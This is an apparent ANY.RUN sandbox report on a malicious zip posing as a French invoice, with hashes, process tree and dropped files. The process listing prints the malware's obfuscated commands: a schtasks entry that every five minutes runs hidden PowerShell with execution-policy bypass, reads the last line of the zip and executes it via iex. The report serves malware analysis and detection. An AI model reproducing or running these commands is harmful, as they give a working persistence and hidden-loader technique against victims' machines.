analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

facture-prestation-OS756951ZD.zip

Full analysis: https://app.any.run/tasks/57483df9-accc-468b-acec-95b50ede0da4
Verdict: Malicious activity
Analysis date: March 14, 2019, 10:26:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

5E50B5DFCF777F375C270AF721AE52F7

SHA1:

A5BA2DEAAFD1B25571AAD508D7F7D1C793B0A8ED

SHA256:

E63428D55BC29C43A0C20845E6E8156C2A4FF33486DD259D6AB00555C8FD6ABA

SSDEEP:

1536:BKfDLBcnu8L1zQRVJX99u4PFNmbyiUAgTInMdg1V7lM/2b+DGndrf7f2CoVKSSOj:BKf3qusQf9u92AoYM/2WGndvgVT7oQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3880)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 3324)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2612)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3376)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: document financier pour client.lnk
ZipUncompressedSize: 2124
ZipCompressedSize: 788
ZipCRC: 0x48ed67ef
ZipModifyDate: 2019:03:13 21:07:22
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
7
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs PhotoViewer.dll no specs cmd.exe no specs schtasks.exe no specs PhotoViewer.dll no specs cmd.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2856"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\facture-prestation-OS756951ZD.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3284C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3324"C:\Windows\System32\cmd.exe" /c schtasks /F /create /TN "AI" /ST 03:05 /sc minute /mo 5 /TR "%COMSPEC:dd=tt% /c powershel%LOCALAPPDATA:~-1% -eP bypasS -win Hi'dde'n -c '&{$r=dir c:\users -r -in factur*.zip|select -last 1;$o=gc -LiteralPat $r.fullname;$o[$o.length-1]|iex}'"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3880schtasks /F /create /TN "AI" /ST 03:05 /sc minute /mo 5 /TR "C:\Windows\system32\cmd.exe /c powershell -eP bypasS -win Hi'dde'n -c '&{$r=dir c:\users -r -in factur*.zip|select -last 1;$o=gc -LiteralPat $r.fullname;$o[$o.length-1]|iex}'"C:\Windows\system32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3748C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2612C:\Windows\system32\cmd.exe /c powershell -eP bypasS -win Hi"dde"n -c "&{$r=dir c:\users -r -in factur*.zip|select -last 1;$o=gc -LiteralPat $r.fullname;$o[$o.length-1]|iex}"C:\Windows\system32\cmd.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3376powershell -eP bypasS -win Hi"dde"n -c "&{$r=dir c:\users -r -in factur*.zip|select -last 1;$o=gc -LiteralPat $r.fullname;$o[$o.length-1]|iex}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
804
Read events
715
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
3
Unknown types
1

Dropped files

PID
Process
Filename
Type
3376powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\41EO46RFR8P73SF0J6OO.temp
MD5:
SHA256:
2856WinRAR.exeC:\Users\admin\Desktop\document-modele-facture-tva-intracommunautaire-8-714x1024.jpgimage
MD5:133E6283EEE515C56C396A33104735B2
SHA256:E8CC03F0E7533F60C36EBF8CABEF1D33D77B73E8C88897A1810AD0F8579B53A3
2856WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa2856.18723\document-modele-facture-tva-intracommunautaire-8-714x1024.jpgimage
MD5:133E6283EEE515C56C396A33104735B2
SHA256:E8CC03F0E7533F60C36EBF8CABEF1D33D77B73E8C88897A1810AD0F8579B53A3
2856WinRAR.exeC:\Users\admin\Desktop\document financier pour client.lnklnk
MD5:ACFAE16AE7EE44E617D7B482811E3D63
SHA256:3714D3742CFF48CD899B60C6A24204713431161AEB2A9265C785133389E1C0D3
2856WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa2856.27691\document-modele-facture-tva-intracommunautaire-8-714x1024.jpgimage
MD5:133E6283EEE515C56C396A33104735B2
SHA256:E8CC03F0E7533F60C36EBF8CABEF1D33D77B73E8C88897A1810AD0F8579B53A3
3376powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF244bfe.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3376powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info